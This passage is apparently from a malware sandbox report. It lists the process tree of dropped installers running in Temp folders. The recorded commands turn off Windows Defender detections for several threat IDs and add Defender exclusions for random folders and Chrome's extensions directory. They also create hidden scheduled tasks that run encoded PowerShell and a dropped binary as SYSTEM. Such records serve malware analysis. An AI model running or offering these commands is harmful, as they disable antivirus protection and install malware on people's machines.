1⤵
PID:6752

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:5904

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 7276 -ip 7276
1⤵
PID:5776

C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe
C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe
1⤵
PID:8832

C:\Users\Admin\AppData\Local\Temp\a\Newoff.exe
C:\Users\Admin\AppData\Local\Temp\a\Newoff.exe
1⤵
PID:6976

C:\Users\Admin\AppData\Local\Temp\7zSB721.tmp\Install.exe
C:\Users\Admin\AppData\Local\Temp\7zSB721.tmp\Install.exe PP /PWZdidqhzu 385118 /S
1⤵
PID:5892

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
2⤵
PID:8752

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
3⤵
PID:8052

C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
4⤵
PID:6352

\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
5⤵
PID:6128

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
3⤵
PID:7356

C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
4⤵
PID:9148

\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
5⤵
PID:4544

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
3⤵
PID:5176

C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
4⤵
PID:7348

\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
5⤵
PID:3036

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
3⤵
PID:4376

C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
4⤵
PID:6588

\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
5⤵
PID:1956

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
3⤵
PID:5132

C:\Windows\SysWOW64\cmd.exe
/C powershell start-process -WindowStyle Hidden gpupdate.exe /force
4⤵
PID:5152

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell start-process -WindowStyle Hidden gpupdate.exe /force
5⤵
- Command and Scripting Interpreter: PowerShell
PID:7644

C:\Windows\SysWOW64\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
6⤵
PID:7200

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
2⤵
PID:2764

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
3⤵
PID:7612

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
4⤵
PID:8916

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
3⤵
PID:8120

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
3⤵
PID:6740

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
3⤵
PID:6516

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
3⤵
PID:8928

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
3⤵
PID:2556

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
3⤵
PID:1696

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
3⤵
PID:348

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
3⤵
PID:3056

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
3⤵
PID:3008

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
3⤵
PID:8488

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
3⤵
PID:6616

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
3⤵
PID:7684

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
3⤵
PID:6760

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
3⤵
PID:8516

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
3⤵
PID:8836

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
3⤵
PID:5836

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
3⤵
PID:648

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
3⤵
PID:5520

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
3⤵
PID:2400

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
3⤵
PID:8528

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
3⤵
PID:2512

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
3⤵
PID:8792

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
3⤵
PID:4132

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32
3⤵
PID:4284

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64
3⤵
PID:1412

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32
3⤵
PID:1108

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64
3⤵
PID:6600

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\NuNDxVhSfKiQUmJwJAR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\NuNDxVhSfKiQUmJwJAR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\QtKEgKYoTGTqC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\QtKEgKYoTGTqC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ZEkGlaTFWGUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ZEkGlaTFWGUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\dlfHiRefefjU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\dlfHiRefefjU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\hsUwQAlMU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\hsUwQAlMU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\nivjmgppGaMJQQVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\nivjmgppGaMJQQVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\DQsmlqqwNqJuTewVy\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\DQsmlqqwNqJuTewVy\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\QqEAMUespgTHJnVz\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\QqEAMUespgTHJnVz\" /t REG_DWORD /d 0 /reg:64;"
2⤵
PID:8140

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NuNDxVhSfKiQUmJwJAR" /t REG_DWORD /d 0 /reg:32
3⤵
PID:9476

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NuNDxVhSfKiQUmJwJAR" /t REG_DWORD /d 0 /reg:32
4⤵
PID:8076

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NuNDxVhSfKiQUmJwJAR" /t REG_DWORD /d 0 /reg:64
3⤵
PID:8868

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QtKEgKYoTGTqC" /t REG_DWORD /d 0 /reg:32
3⤵
PID:7424

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QtKEgKYoTGTqC" /t REG_DWORD /d 0 /reg:64
3⤵
PID:5432

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZEkGlaTFWGUn" /t REG_DWORD /d 0 /reg:32
3⤵
PID:9856

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZEkGlaTFWGUn" /t REG_DWORD /d 0 /reg:64
3⤵
PID:3928

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\dlfHiRefefjU2" /t REG_DWORD /d 0 /reg:32
3⤵
PID:7216

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\dlfHiRefefjU2" /t REG_DWORD /d 0 /reg:64
3⤵
PID:7688

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\hsUwQAlMU" /t REG_DWORD /d 0 /reg:32
3⤵
PID:9984

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\hsUwQAlMU" /t REG_DWORD /d 0 /reg:64
3⤵
PID:10064

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\nivjmgppGaMJQQVB /t REG_DWORD /d 0 /reg:32
3⤵
PID:10188

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\nivjmgppGaMJQQVB /t REG_DWORD /d 0 /reg:64
3⤵
PID:9892

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
3⤵
PID:10208

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
3⤵
PID:10220

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\DQsmlqqwNqJuTewVy /t REG_DWORD /d 0 /reg:32
3⤵
PID:2712

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\DQsmlqqwNqJuTewVy /t REG_DWORD /d 0 /reg:64
3⤵
PID:9512

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\QqEAMUespgTHJnVz /t REG_DWORD /d 0 /reg:32
3⤵
PID:9716

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\QqEAMUespgTHJnVz /t REG_DWORD /d 0 /reg:64
3⤵
PID:7576

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gJbirgRCK" /SC once /ST 04:07:19 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
2⤵
- Creates scheduled task(s)
PID:7268

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gJbirgRCK"
2⤵
PID:1092

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gJbirgRCK"
2⤵
PID:4248

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "ZTNkTKukmvvbOMPkn" /SC once /ST 10:02:01 /RU "SYSTEM" /TR "\"C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\JpxEUBN.exe\" 0c /lohzdiddg 385118 /S" /V1 /F
2⤵
- Creates scheduled task(s)
PID:6836

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "ZTNkTKukmvvbOMPkn"
2⤵
PID:4936

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5892 -s 960
2⤵
- Program crash
PID:3196

C:\Users\Admin\AppData\Local\Temp\7zS18D9.tmp\Install.exe
C:\Users\Admin\AppData\Local\Temp\7zS18D9.tmp\Install.exe PP /wRMdidGDkz 385118 /S
1⤵
PID:5424

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
2⤵
PID:4568

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
3⤵
PID:8840

C:\Windows\SysWOW64\cmd.exe
